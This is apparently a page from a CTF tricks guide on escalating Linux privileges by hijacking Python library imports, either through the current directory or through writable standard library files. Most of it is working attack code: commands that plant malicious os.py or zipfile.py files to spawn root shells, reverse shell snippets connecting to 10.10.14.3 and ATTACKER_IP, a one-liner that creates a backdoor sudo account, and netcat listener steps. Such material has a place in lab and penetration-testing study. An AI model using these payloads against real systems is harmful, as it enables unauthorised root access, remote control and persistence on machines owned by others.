> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-14/linux/capabilities/privilege-escalation-linux-python.md).

# Python

## Python Library Hijacking Via Current Directory

Python prioritizes the current working directory when searching for modules to import. If a script imports a library (e.g., `zipfile`) and a file with the same name (`zipfile.py`) exists in the script's directory, Python will import the local file instead of the standard library module. This is due to the fact that Python searches for modules in the directories listed within the `sys.path` variable. By default, the first entry in this variable is the directory containing the script being executed.

To exploit this, create a Python file in the target script's directory with the same name as a library the script imports, containing malicious code. For instance, targeting the `zipfile` module:

```bash
echo 'import os
os.system("/bin/bash")' > /home/meliodas/zipfile.py
```

Then, execute the target script. If it imports `zipfile`, the malicious code will run.

```bash
sudo /usr/bin/python3 /home/meliodas/bak.py
```

Another common target for this type of hijacking is the `os` module. A malicious file named `os.py` can be placed in the target directory.

The malicious `os.py` file could contain code like:

```python
import subprocess
subprocess.call(['/bin/bash'])
```

Or, for a reverse shell:

```python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.3",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"]);
```

To create this malicious file from the command line:

```bash
echo 'import subprocess
subprocess.call(["/bin/bash"])' > os.py
```

Consider a target script that simply imports the `os` module:

```python
import os
```

When the target script is executed from the directory containing the malicious `os.py`, the local file will be imported instead of the standard library, executing the malicious code.

***

## Python Library Hijacking via Writable File

Identify a privileged script that imports a standard Python library (tools like `pspy` can help spot these running processes). Check if your current user has write access to any of the files corresponding to the imported libraries. This technique involves finding a Python script that is executed with elevated privileges and imports a Python library that you have write permissions on. A quick way to find potentially writable files system-wide is using `find`:

```bash
find / -type f -writable 2>/dev/null
```

If you have write permissions on one of the imported library files, you can modify it and add your malicious payload. Once a writable standard library file is identified (e.g., `/usr/lib/python3.8/shutil.py`), overwrite its contents with malicious Python code that executes your desired command (like a reverse shell) when the library is imported.

For example, if the script imports a library, you can add code to the beginning of the library file. A common method for a reverse shell involves the `socket`, `subprocess`, and `os` modules:

```python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("ATTACKER_IP",ATTACKER_PORT))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
subprocess.call(["/bin/sh","-i"])
```

Alternatively, if a script runs as root and imports a library like `sys`, and you have write permissions on `/usr/lib/pythonX.X/sys.py`, you can inject code into it. For example, to execute a command:

```python
import os; os.system('command_to_execute')
```

Or to add a user with sudo privileges, you can use `os.system` to run shell commands, including generating a password hash:

```python
import os
os.system("useradd -m attacker -p $(openssl passwd -1 password); usermod -aG sudo attacker")
```

Set up a listener on your attacker machine (e.g., `nc -lvnp 4444`) and wait for the privileged script to execute, import the poisoned library, and trigger the payload.
